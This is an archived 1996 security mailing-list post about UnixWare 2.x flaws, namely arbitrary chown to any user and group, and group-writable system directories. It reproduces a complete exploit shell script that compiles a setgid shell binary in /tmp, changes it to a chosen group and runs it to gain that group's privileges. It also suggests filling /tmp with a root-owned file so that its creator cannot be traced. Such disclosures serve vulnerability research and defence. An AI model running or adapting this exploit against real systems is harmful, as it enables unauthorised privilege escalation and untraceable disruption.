[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    BoS: More on UnixWare 2.x vulnerability
From:       Julian Assange <proff () suburbia ! net>
Date:       1996-09-01 14:23:58
[Download RAW message or body]


I've found out a more about UnixWare 2.  It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group.  Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin.  Okay, now someone else tell me who created that file.

Anyway, back to the setgid problem.  I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug.  It follows.  While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group.  This is
bad, very bad.

=====

#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
r

[prev in list] [next in list] [prev in thread] [next in thread]